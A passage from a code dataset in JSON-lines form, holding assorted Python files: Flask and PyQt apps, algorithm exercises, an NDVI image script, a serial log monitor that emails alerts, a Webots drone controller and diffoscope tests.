column_names]))\n\n c = self._conn.cursor()\n c.execute(stmt, tuple(params))\n return orm(c, self._dto_type)\n","repo_name":"y0natancohen/spl4","sub_path":"dbtools.py","file_name":"dbtools.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37542934491","text":"from flask import Flask, request, jsonify, render_template\nfrom integrator import data_converter\n\napp = Flask(__name__)\n\n@app.route('/main', methods=['POST'])\ndef main():\n data = request.json\n input_data = data.get('inputData', {})\n output_data = data_converter(input_data)\n\n return jsonify(output_data)\n\n\n@app.route('/')\ndef index():\n return render_template('main.html')\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)","repo_name":"szalecki-a/Krasowskis_calculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28711683313","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n head = ListNode()\n current = head\n while l1 or l2 :\n if l1 and l2 :\n if l1.val > l2.val :\n current.next = ListNode(l2.val)\n current = current.next\n l2 = l2.next\n else :\n current.next = ListNode(l1.val)\n current = current.next\n l1 = l1.next\n else :\n c = l1 if l1 else l2\n current.next = c\n break\n return head.next","repo_name":"sbyeol3/Algorithm-Study","sub_path":"LeetCode/Q1-Q500/Q21.py","file_name":"Q21.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"34819903975","text":"# 재귀를 이용한 DFS\ndef recursive_dfs(v, discovered=[]):\n discovered.append(v)\n\n for x in graph[v]:\n if x not in discovered:\n recursive_dfs(x, discovered)\n\n return discovered\n\ndef iterative_dfs(v, discovered=[]):\n stack = [v]\n\n while stack:\n x = stack.pop()\n if x not in discovered:\n discovered.append(x)\n for value in graph[x]:\n stack.append(value)\n\n return discovered\n\ngraph = {\n 1: [2, 3, 4],\n 2: [5],\n 3: [5],\n 4: [],\n 5: [6, 7],\n 6: [],\n 7: [3]\n}\n\nprint(recursive_dfs(1))\nprint(iterative_dfs(1))","repo_name":"Park-min-hyoung/PAI","sub_path":"그래프/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35614368756","text":"from PyQt5 import QtWidgets as qtw\nfrom PyQt5 import QtGui as qtg\nfrom PyQt5 import QtCore as qtc\nfrom PyQt5 import QtChart as qtch\n\nfrom ReadWriteMem import ReadWriteMemory\n\nfrom designer.dmc_mod_from import Ui_DmcEegModForm\n\n\nclass DMCMod(qtw.QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n # Window Initialization\n self.setWindowTitle('DMC5 EEG Concentration Mod')\n central_wdg = qtw.QWidget()\n self.setCentralWidget(central_wdg)\n self.mod_form = Ui_DmcEegModForm()\n self.mod_form.setupUi(central_wdg)\n self.status = qtw.QStatusBar()\n self.setStatusBar(self.status)\n\n self.is_connected = False\n self.is_injecting = False\n self.current_eeg_concentration = 0.6\n\n # Read Write Memory params\n self.rwm = ReadWriteMemory()\n self.process = None\n self.concentration_ptr = None\n\n # Buttons Trigger\n self.mod_form.connectBtn.clicked.connect(self.connect)\n self.mod_form.setValBtn.clicked.connect(self.form_set_value)\n self.mod_form.startBtn.clicked.connect(self.execute_injection)\n\n self.concentration_update_value = 0\n\n # Timers\n self.value_update_timer = qtc.QTimer()\n self.value_update_timer.timeout.connect(self.update_value)\n self.injection_timer = qtc.QTimer()\n self.injection_timer.timeout.connect(self.inject_value)\n\n def inject_value(self):\n # TODO: check if in combat\n self.write_dmc_concentration(self.concentration_update_value)\n\n def update_value(self):\n print('update dmc5')\n # calculate update value\n dmc_concentration = self.read_dmc_concentration()\n update_value = self.current_eeg_concentration - self.mod_form.thrSpinBox.value()\n if update_value > 0:\n update_value *= self.mod_form.addSpinBox.value()\n else:\n update_value *= self.mod_form.subSpinBox.value()\n\n next_concentration_value = dmc_concentration + update_value\n if next_concentration_value > 300:\n next_concentration_value = 300\n elif next_concentration_value < 0:\n next_concentration_value = 0\n\n # update status values\n self.mod_form.concentrationLabel.setText(str(self.current_eeg_concentration))\n self.mod_form.updateLabel.setText(str(update_value))\n self.mod_form.gameLabel.setText(str(dmc_concentration))\n self.mod_form.nextGameLabel.setText(str(next_concentration_value))\n\n # update game value\n self.concentration_update_value = next_concentration_value\n\n\n def execute_injection(self):\n if not self.is_connected:\n print('not connected to game')\n return\n if not self.is_injecting:\n print('start inject')\n update_interval = self.mod_form.valUpdateIntervalSpinBox.value()\n inject_interval = self.mod_form.injectIntervalSpinBox.value()\n self.value_update_timer.start(update_interval)\n self.injection_timer.start(inject_interval)\n self.mod_form.startBtn.setText('Stop Injection')\n self.mod_form.connectBtn.setDisabled(True)\n self.is_injecting = True\n else:\n self.value_update_timer.stop()\n self.injection_timer.stop()\n self.mod_form.connectBtn.setDisabled(False)\n self.mod_form.startBtn.setText('Start Injection')\n self.is_injecting = False\n\n def form_set_value(self):\n val = self.mod_form.valSpinBox.value()\n self.concentration_update_value = val\n if self.is_connected:\n self.write_dmc_concentration(val)\n # update status values\n self.mod_form.concentrationLabel.setText(str(self.current_eeg_concentration))\n self.mod_form.updateLabel.setText(str(0))\n self.mod_form.gameLabel.setText(str(val))\n self.mod_form.nextGameLabel.setText(str(val))\n\n # Base Methods\n def connect(self):\n if not self.is_connected:\n self.process = self.rwm.get_process_by_name('DevilMayCry5.exe')\n self.process.open()\n\n # Get concentration pointer\n base_offset = 0X7E61B90\n module_addr = int(str(self.process.base_addr), 0) + int(str(base_offset), 0)\n self.concentration_ptr = self.process.get_pointer(lp_base_address=module_addr, offsets=[0x78, 0x1B50])\n\n # TODO: Get in combat ptr\n self.is_connected = True\n self.mod_form.connectBtn.setText('Disconnect')\n print('connection to dmc5')\n else:\n self.process.close()\n self.is_connected = False\n self.mod_form.connectBtn.setText('Connect')\n print('disconnect from dmc5')\n\n def read_dmc_concentration(self):\n con_val = self.process.read_float(self.concentration_ptr)\n print('Read concentration:', con_val)\n return con_val\n\n def write_dmc_concentration(self, val):\n state = self.process.write(self.concentration_ptr, val)\n print('write concentration state:', state)\n\n def closeEvent(self, event):\n if self.is_connected:\n self.process.close()\n self.is_connected = False\n","repo_name":"aryanakr/open-sourece-python-EEG-handling-software","sub_path":"dmc_mod.py","file_name":"dmc_mod.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8168599952","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 20 10:37:45 2021\r\n\r\n@author: cosmi\r\n\"\"\"\r\n\r\n\"\"\"\r\nDenoised Vegetation Index Mapping program using DJI Mavic 2 Pro\r\nJPEG 16-bit combo images taken using InfraBlue Filter\r\n%(c)-J. Campbell MuonRay Enterprises 2021\r\n% creative commons For non-profit use only\r\nThis Python script was created using the Spyder Editor\r\n\"\"\"\r\n\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\nfrom PIL import Image\r\nimport pylab\r\nimport rof\r\n\r\nfrom scipy import misc\r\nimport imageio\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt # For image viewing\r\n\r\n#!/usr/bin/python\r\nimport os\r\nimport getopt\r\nimport sys\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import colors\r\nfrom matplotlib import ticker\r\nfrom matplotlib.colors import LinearSegmentedColormap\r\n\r\n\r\n\r\n#a nice selection of grayscale colour palettes\r\ncols1 = ['blue', 'green', 'yellow', 'red']\r\ncols2 = ['gray', 'gray', 'red', 'yellow', 'green']\r\ncols3 = ['gray', 'blue', 'green', 'yellow', 'red']\r\n\r\ncols4 = ['black', 'gray', 'blue', 'green', 'yellow', 'red']\r\n\r\ndef create_colormap(args):\r\n return LinearSegmentedColormap.from_list(name='custom1', colors=cols3)\r\n\r\n#colour bar to match grayscale units\r\ndef create_colorbar(fig, image):\r\n position = fig.add_axes([0.125, 0.19, 0.2, 0.05])\r\n norm = colors.Normalize(vmin=-1., vmax=1.)\r\n cbar = plt.colorbar(image,\r\n cax=position,\r\n orientation='horizontal',\r\n norm=norm)\r\n cbar.ax.tick_params(labelsize=6)\r\n tick_locator = ticker.MaxNLocator(nbins=3)\r\n cbar.locator = tick_locator\r\n cbar.update_ticks()\r\n cbar.set_label(\"NDVI\", fontsize=10, x=0.5, y=0.5, labelpad=-25)\r\n\r\n\r\n\r\nfor infile in os.listdir(\"./\"):\r\n print( \"file : \" + infile)\r\n if infile[-3:] == \"jpg\" or infile[-3:] == \"JPG\" :\r\n # print \"is tif or DNG (RAW)\"\r\n outfile = infile[:-3] + \"jpg\"\r\n rgb = misc.imread(infile)\r\n \r\n \r\n print( \"new filename : \" + outfile)\r\n # Extract Red, Green and Blue channels and save as separate files\r\n \r\n\r\n R = rgb[:,:,0]\r\n G = rgb[:,:,1]\r\n B = rgb[:,:,2]\r\n \r\n # Get the red band from the rgb image, and open it as a numpy matrix\r\n#NIR = image[:, :, 0]\r\n#ir = np.asarray(NIR, float)\r\n \r\n ir = (R).astype('float')\r\n \r\n# Get one of the IR image bands (all bands should be same)\r\n#blue = image[:, :, 2]\r\n\r\n#r = np.asarray(blue, float)\r\n \r\n r = (B).astype('float')\r\n \r\n #denoise\r\n \r\n denoised_ir_channel = ir\r\n \r\n \r\n U,T = rof.denoise(denoised_ir_channel,denoised_ir_channel)\r\n \r\n #pylab.figure()\r\n #pylab.gray()\r\n #pylab.imshow(U)\r\n #pylab.axis('equal')\r\n #pylab.axis('off')\r\n #pylab.show()\r\n\r\n\r\n# Create a numpy matrix of zeros to hold the calculated NDVI values for each pixel\r\n # The NDVI image will be the same size as the input image\r\n\r\n \r\n ndvi = np.zeros(r.size) \r\n \r\n# Calculate NDVI\r\n \r\n \r\n ndvi = np.true_divide(np.subtract(U, r), np.add(U, r))\r\n fig, ax = plt.subplots()\r\n\r\n image = ax.imshow(ndvi, cmap=create_colormap(colors))\r\n plt.axis('off')\r\n #Lock or Unlock Key Bar Here for Mapping/Sampling/Showcasing:\r\n #create_colorbar(fig, image)\r\n extent = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())\r\n #imageio.imsave(outfile, ndvi)\r\n fig.savefig(outfile, dpi=600, transparent=True, bbox_inches=extent, pad_inches=0)\r\n\r\n # plt.show()\r\n \r\n \r\n# rgb = raw.postprocess()\r\n\r\n # plt.show()","repo_name":"MuonRay/Image_Denoising_with_ROF_algorithm","sub_path":"ndvi_denoise_batch.py","file_name":"ndvi_denoise_batch.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"}
+{"seq_id":"24379849888","text":"## Momentum indicator compares current price with previous \n# price from selected number of periods ago.\n\n#%%\nimport pandas as pd\nfrom pandas_datareader import data\nimport matplotlib.pyplot as plt\n\n\nstart_date = '2014-01-01'\nend_date = '2018-01-01'\n\nSRC_DATA_FILENAME = 'goog_data.pkl'\n\ntry:\n goog_data2 = pd.read_pickle(SRC_DATA_FILENAME)\nexcept FileNotFoundError:\n goog_data2 = data.DataReader('GOOG', start_date, end_date)\n goog_data2.to_pickle(SRC_DATA_FILENAME)\n\ngoog_data = goog_data2.tail(620) \nclose = goog_data['Close']\n\ntime_period = 20\nhistory = []\nmom_values = []\n\nfor close_price in close:\n history.append(close_price)\n if len(history) > time_period:\n del (history[0])\n \n mom = close_price - history[0]\n mom_values.append(mom)\n \ngoog_data = goog_data.assign(ClosePrice=pd.Series(close, index=goog_data.index))\ngoog_data = goog_data.assign(MomentumFromPrice20DaysAgo=pd.Series(mom_values, index=goog_data.index))\n\nclose_price = goog_data['ClosePrice']\nmom = goog_data['MomentumFromPrice20DaysAgo']\n\nfig = plt.figure()\nax1 = fig.add_subplot(211, ylabel='Google price in $')\nclose_price.plot(ax=ax1, color='g', lw=2, legend=True)\nax2 = fig.add_subplot(212, ylabel='Momentum in $')\nmom.plot(ax=ax2, color='b', lw=2, legend=True)\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# %%\n","repo_name":"agbleze/python_algotrade","sub_path":"mom.py","file_name":"mom.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"42243747327","text":"#!/usr/bin/python2\n\nimport sys\nimport argparse\nimport pexpect\nimport select\nimport re\nimport smtplib\nimport os\nimport time\nimport smtp_credentials\n\nfrom email.mime.text import MIMEText\n\n#FIXME: Known bug: last line not seen\n\nparser = argparse.ArgumentParser(description='Log parser')\n\nparser.add_argument('FILE', help='path to the log to parse')\nparser.add_argument('RELAY', type=int, help=\"relay port associated to the board whose log is being parsed\")\nparser.add_argument('RELAY_IP', help=\"IP address of the relays\")\nparser.add_argument('RELAY_PORT', type=int, help=\"port of the relays\")\n\nargs = parser.parse_args()\n\npower_cmd = \"command_relay.py %s %d %d\" % (args.RELAY_IP, args.RELAY_PORT, args.RELAY)\n\n\nrecipients = smtp_credentials.recipients\nme = smtp_credentials.mail\n\ndef send_mail(status, filename, line=\"\", reboot=False):\n\tcontent = \"%s occured on device %s:\\n%s\" % (status, filename, line)\n\tif reboot:\n\t\tcontent += \"\\nThe device is being rebooted.\"\n\tmsg = MIMEText(content)\n\tmsg['Subject'] = \"%s on device %s\" % (status, filename)\n\tmsg['To'] = \", \".join(recipients)\n\tmsg['From'] = me\n\tserver = smtplib.SMTP(smtp_credentials.server, smtp_credentials.port)\n\tserver.ehlo()\n\tserver.starttls()\n\tserver.login(smtp_credentials.login, smtp_credentials.password)\n\tserver.sendmail(me, recipients, msg.as_string())\n\tserver.quit()\n\ndef reboot_board():\n\tos.spawnvp(os.P_WAIT, 'command_relay.py', (power_cmd + \" off\").split())\n\ttime.sleep(5)\n\tos.spawnvp(os.P_WAIT, 'command_relay.py', (power_cmd + \" on\").split())\n\ndef timeout_detected(filename):\n\tif time.mktime(time.gmtime()) >= freeze_timeout + last_line:\n\t\tsend_mail(\"timeout of %ds\" % freeze_timeout, filename, reboot=True)\n\t\treboot_board()\n\n#Timeout in milli seconds before serial is considered frozen\ntimeout = 60 * 1000 * 10\n\n#Timeout in seconds before board is declared crashed\nfreeze_timeout = 60 * 30\nlast_line = time.mktime(time.gmtime())\nfirst_err = True\n\nboard_rebooted_re = re.compile('Hit any key to stop autoboot')\nreboot_templates = ['send stop command failed', 'Oops']\nmatching_templates = ['UBI.*err']\nmatching_res = []\nreboot_res = []\nfor matching_template in matching_templates:\n\tmatching_res.append(re.compile(matching_template))\n\nfor reboot_template in reboot_templates:\n\treboot_res.append(re.compile(reboot_template))\n\nserial = pexpect.spawn(\"tail -F %s\" % args.FILE, timeout=freeze_timeout)\npoll = select.poll()\npoll.register(serial, select.POLLIN)\n\nwhile True:\n\tpoll_ok = poll.poll(timeout)\n\tif not poll_ok:\n\t\ttimeout_detected(args.FILE)\n\t\tcontinue\n\n\ttry:\n\t\tline = serial.readline()\n\texcept pexpect.TIMEOUT:\n\t\ttimeout_detected(args.FILE)\n\t\tcontinue\n\n\tlast_line = time.mktime(time.gmtime())\n\tif board_rebooted_re.search(line):\n\t\tfirst_err = True\n\tfor matching_re in matching_res:\n\t\tmatch = matching_re.search(line)\n\t\tif match:\n\t\t\tif first_err:\n\t\t\t\tsend_mail(\"error\", args.FILE, line)\n\t\t\tfirst_err = False\n\t\t\tbreak\n\tif match:\n\t\tcontinue\n\tfor reboot_re in reboot_res:\n\t\tmatch = reboot_re.search(line)\n\t\tif match:\n\t\t\tif first_err:\n\t\t\t\tsend_mail(\"error\", args.FILE, line, True)\n\t\t\t\treboot_board()\n\t\t\tfirst_err = False\n\t\t\tbreak\n\n\nsys.exit(0)\n","repo_name":"bbrezillon/ntc-test-automation","sub_path":"log_parser.py","file_name":"log_parser.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12371603899","text":"import os\n\nfrom vars import var\n\nfrom pyrogram import Client, idle\n\n\n\nlogging.getLogger(\"pyrogram\").setLevel(logging.INFO)\n\nTgraph = Client(\n \"Telegra.ph Uploader\",\n api_id=var.API_ID,\n api_hash=var.API_HASH,\n bot_token=var.BOT_TOKEN,\n plugins=dict(root=\"plugins\"),\n)\n\n\n\n\nTgraph.start()\nuname = (Tgraph.get_me()).username\nprint(f\"@{uname} Deployed Successfully !\")\n\nidle()\n\n\n\n","repo_name":"Captainamarica/NightVission-Telegrapbot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29992892657","text":"\ndef soroban(frame):\n for i in range(len(frame)):\n frame[i] = frame[i][::-1]\n ans = 0\n power = 1\n for elem in frame[0]:\n if elem == '|':\n # '5-bead' is active:\n ans += 5 * power\n power *= 10\n power = 1\n for col in range(len(frame[0])):\n cnt = 0\n idx = 3\n while idx < len(frame) and frame[idx][col] == 'O':\n cnt += 1\n idx += 1\n ans += cnt * power\n power *= 10\n return ans\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"ivSPJNgW4ChfbrKbR_20.py","file_name":"ivSPJNgW4ChfbrKbR_20.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17224858857","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 27 08:49:45 2020\n\n@author: Angel Ayala \n\"\"\"\nimport numpy as np\n\nfrom webots_drone.utils import bytes2image\n\n\nclass Drone:\n \"\"\"The Drone class manage each sensor and actuators of the drone.\n\n It is developed for the Mavic 2 Pro drone, it consists of GPS, IMU, Gyro,\n Compass, Camera, LED and Motor nodes.\n This drone control unit is designed to stabilize the drone through 4 PID\n controllers tunned for a 8ms simulation timestep, and the drone's gimbal\n with a Damping node in the WorldInfo node with values of 0.5 for both\n angular and linear fields.\n\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n :param string name: A name for the controller, just for debug purpose.\n :param float start_alt: The initial altitude to be reached.\n \"\"\"\n\n def __init__(self, robot):\n # Time helpers\n self.time_counter = 0\n\n # Variables\n self.lift_thrust = 68.5 # with this thrust, the drone lifts.\n self.init_dist_sensors(robot, int(robot.getBasicTimeStep()))\n self.init_devices(robot, int(robot.getBasicTimeStep()))\n self._position = np.array([0.0, 0.0, 0.0])\n\n def init_dist_sensors(self, drone_node, timestep):\n \"\"\"Initialize each sensor distance of the Mavic 2 Pro.\n\n :param drone_node Robot: The instantiated Robot Node class.\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n \"\"\"\n self.sensors_id = ['front left dist sonar',\n 'front right dist sonar',\n 'rear top dist sonar',\n 'rear bottom dist sonar',\n 'left side dist sonar',\n 'right side dist sonar',\n 'down front dist sonar',\n 'down back dist sonar',\n 'top dist infrared']\n # instantiate distance sensors\n self.sensors = list()\n for sid in self.sensors_id:\n sensor = drone_node.getDevice(sid)\n sensor.enable(timestep)\n self.sensors.append(sensor)\n\n return True\n\n def init_devices(self, drone_node, timestep):\n \"\"\"Initialize each device of the Mavic 2 Pro, in a desired timestep.\n\n The camera node is initialized at 33ms timestep to reach ~30fps.\n\n :param drone Robot: The instantiated Robot Node class.\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n \"\"\"\n # Position coordinates [X, Y, Z]\n self.gps = drone_node.getDevice(\"gps\")\n self.gps.enable(timestep)\n # Angles respect global coordinates [roll, pitch, yaw]\n self.imu = drone_node.getDevice(\"inertial unit\")\n self.imu.enable(timestep)\n # Acceleration angles [roll, pitch, yaw]\n self.gyro = drone_node.getDevice(\"gyro\")\n self.gyro.enable(timestep)\n # Direction degree with north as reference\n self.compass = drone_node.getDevice(\"compass\")\n self.compass.enable(timestep)\n\n # Video acquisition\n fps = 25\n self.camera = drone_node.getDevice(\"camera\")\n self.camera_rate = 1000 // fps\n self.camera.enable(self.camera_rate)\n\n # LEDS\n self.leds = [\n drone_node.getDevice(\"front left led\"),\n drone_node.getDevice(\"front right led\")\n ]\n\n # Gimbal\n self.camera_roll = drone_node.getDevice(\"camera roll\")\n self.camera_pitch = drone_node.getDevice(\"camera pitch\")\n\n # Motors\n self.motors_id = ['front left propeller',\n 'front right propeller',\n 'rear left propeller',\n 'rear right propeller']\n self.motors = list()\n for mid in self.motors_id:\n motor = drone_node.getDevice(mid)\n motor.setPosition(float('inf'))\n motor.setVelocity(1.)\n self.motors.append(motor)\n\n return True\n\n def blink_leds(self):\n \"\"\"Blink the LED nodes.\"\"\"\n led_state = int(self.time_counter) % 2\n self.leds[0].set(led_state)\n self.leds[1].set(int(not led_state))\n\n def gimbal_stabilize(self):\n \"\"\"Stabilize camera (gimbal).\"\"\"\n acceleration = self.gyro.getValues()\n self.camera_roll.setPosition(-0.115 * acceleration[0])\n self.camera_pitch.setPosition(-0.1 * acceleration[1])\n\n def get_odometry(self):\n \"\"\"Get the drone's current acceleration, angles and position.\"\"\"\n orientation = self.imu.getRollPitchYaw()\n angular_velocity = self.gyro.getValues()\n position = self.gps.getValues()\n speed = self.gps.getSpeedVector()\n compass = self.compass.getValues()\n north_rad = np.arctan2(compass[0], compass[1])\n\n return orientation, angular_velocity, position, speed, north_rad\n\n def get_image(self):\n \"\"\"Get the Camera node image with size and channels.\n\n :return the data image with BGRA values\n \"\"\"\n camera_image = None\n if self.camera.getImage():\n camera_image = bytes2image(self.camera.getImage(),\n self.get_camera_image_shape())\n return camera_image\n\n def get_dist_sensors(self):\n \"\"\"Get the Distance sensors Nodes' measurements.\"\"\"\n sensors = dict()\n for i, sensor_name in enumerate(self.sensors_id):\n dist_sensor = self.sensors[i]\n sensors[sensor_name] = [dist_sensor.getValue(),\n dist_sensor.getMinValue(),\n dist_sensor.getMaxValue()]\n return sensors\n\n def get_camera_image_shape(self):\n \"\"\"Get the camera image dimension and channels.\"\"\"\n return (self.camera.getHeight(), self.camera.getWidth(), 4) # channels\n\n def set_motors_velocity(self, fl_motor, fr_motor, rl_motor, rr_motor):\n \"\"\"Set the drone's motor velocity.\"\"\"\n # Actuate over the motors\n if not np.isnan(fl_motor):\n self.motors[0].setVelocity(self.lift_thrust + fl_motor)\n self.motors[1].setVelocity(-(self.lift_thrust + fr_motor))\n self.motors[2].setVelocity(-(self.lift_thrust + rl_motor))\n self.motors[3].setVelocity(self.lift_thrust + rr_motor)\n","repo_name":"angel-ayala/gym-webots-drone","sub_path":"controllers/drone_controller/drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1001993413","text":"def q1(inputString):\n if len(inputString) < 2:\n print('There is no third largest integer for this input.')\n return\n #print the largest letter from the string\n currentIndex = 0\n currentMaxChar = 'a'\n currentSecondMaxChar = 'a'\n currentThirdMaxChar = 'a'\n while currentIndex < len(inputString):\n currentChar = inputString[currentIndex]\n if (currentChar.lower() > currentMaxChar):\n currentMaxChar = currentChar\n currentSecondMaxChar = currentMaxChar\n if (currentChar < currentMaxChar):\n currentSecondMaxChar = currentChar\n currentThirdMaxChar = currentSecondMaxChar\n if (currentChar < currentSecondMaxChar):\n currentThirdMaxChar = currentSecondMaxChar\n currentIndex = currentIndex + 1\n\n maxLetterCount = 0\n for a in inputString:\n count = 0\n for b in inputString:\n if(a == b):\n count = count + 1\n if(count > maxLetterCount):\n maxLetterCount = count\n repeatLetter = a\n print('In {}, the largest letter is {}, the third largest letter is {}, and the most common letter is {}, occuring {} times.'.format(inputString,currentMaxChar,currentThirdMaxChar,repeatLetter,maxLetterCount))\n return\n","repo_name":"nihaal-gill/Example-Coding-Projects","sub_path":"Working with Strings/Strings.py","file_name":"Strings.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28468405102","text":"import os.path\nimport shutil\nimport pytest\nfrom diffoscope.comparators import specialize\nfrom diffoscope.comparators.binary import FilesystemFile, NonExistingFile\ntry:\n from diffoscope.comparators.debian import DotChangesFile, DotDscFile\n miss_debian_module = False\nexcept ImportError:\n from diffoscope.comparators.debian_fallback import DotChangesFile, DotDscFile\n miss_debian_module = True\nfrom diffoscope.config import Config\nfrom diffoscope.presenters.text import output_text\n\nTEST_DOT_CHANGES_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.changes')\nTEST_DOT_CHANGES_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.changes')\nTEST_DEB_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.deb')\nTEST_DEB_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.deb')\n\n@pytest.fixture\ndef dot_changes1(tmpdir):\n tmpdir.mkdir('a')\n dot_changes_path = str(tmpdir.join('a/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_changes_path)\n shutil.copy(TEST_DEB_FILE1_PATH, str(tmpdir.join('a/test_1_all.deb')))\n return specialize(FilesystemFile(dot_changes_path))\n\n@pytest.fixture\ndef dot_changes2(tmpdir):\n tmpdir.mkdir('b')\n dot_changes_path = str(tmpdir.join('b/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE2_PATH, dot_changes_path)\n shutil.copy(TEST_DEB_FILE2_PATH, str(tmpdir.join('b/test_1_all.deb')))\n return specialize(FilesystemFile(dot_changes_path))\n\ndef test_dot_changes_identification(dot_changes1):\n assert isinstance(dot_changes1, DotChangesFile)\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_invalid(tmpdir):\n tmpdir.mkdir('a')\n dot_changes_path = str(tmpdir.join('a/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_changes_path)\n # we don't copy the referenced .deb\n identified = specialize(FilesystemFile(dot_changes_path))\n assert not isinstance(identified, DotChangesFile)\n\ndef test_dot_changes_no_differences(dot_changes1):\n difference = dot_changes1.compare(dot_changes1)\n assert difference is None\n\n@pytest.fixture\ndef dot_changes_differences(dot_changes1, dot_changes2):\n difference = dot_changes1.compare(dot_changes2)\n output_text(difference, print_func=print)\n return difference.details\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_description(dot_changes_differences):\n assert dot_changes_differences[0]\n expected_diff = open(os.path.join(os.path.dirname(__file__), '../data/dot_changes_description_expected_diff')).read()\n assert dot_changes_differences[0].unified_diff == expected_diff\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_internal_diff(dot_changes_differences):\n assert dot_changes_differences[2].source1 == 'test_1_all.deb'\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_compare_non_existing(monkeypatch, dot_changes1):\n monkeypatch.setattr(Config.general, 'new_file', True)\n difference = dot_changes1.compare(NonExistingFile('/nonexisting', dot_changes1))\n output_text(difference, print_func=print)\n assert difference.source2 == '/nonexisting'\n assert difference.details[-1].source2 == '/dev/null'\n\nTEST_DOT_DSC_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.dsc')\nTEST_DOT_DSC_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.dsc')\nTEST_DEB_SRC1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.debsrc.tar.gz')\nTEST_DEB_SRC2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.debsrc.tar.gz')\n\n@pytest.fixture\ndef dot_dsc1(tmpdir):\n tmpdir.mkdir('a')\n dot_dsc_path = str(tmpdir.join('a/test_1.dsc'))\n shutil.copy(TEST_DOT_DSC_FILE1_PATH, dot_dsc_path)\n shutil.copy(TEST_DEB_SRC1_PATH, str(tmpdir.join('a/test_1.tar.gz')))\n return specialize(FilesystemFile(dot_dsc_path))\n\n@pytest.fixture\ndef dot_dsc2(tmpdir):\n tmpdir.mkdir('b')\n dot_dsc_path = str(tmpdir.join('b/test_1.dsc'))\n shutil.copy(TEST_DOT_DSC_FILE2_PATH, dot_dsc_path)\n shutil.copy(TEST_DEB_SRC2_PATH, str(tmpdir.join('b/test_1.tar.gz')))\n return specialize(FilesystemFile(dot_dsc_path))\n\ndef test_dot_dsc_identification(dot_dsc1):\n assert isinstance(dot_dsc1, DotDscFile)\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_invalid(tmpdir, dot_dsc2):\n tmpdir.mkdir('a')\n dot_dsc_path = str(tmpdir.join('a/test_1.dsc'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_dsc_path)\n # we don't copy the referenced .tar.gz\n identified = specialize(FilesystemFile(dot_dsc_path))\n assert not isinstance(identified, DotDscFile)\n\ndef test_dot_dsc_no_differences(dot_dsc1):\n difference = dot_dsc1.compare(dot_dsc1)\n assert difference is None\n\n@pytest.fixture\ndef dot_dsc_differences(dot_dsc1, dot_dsc2):\n difference = dot_dsc1.compare(dot_dsc2)\n output_text(difference, print_func=print)\n return 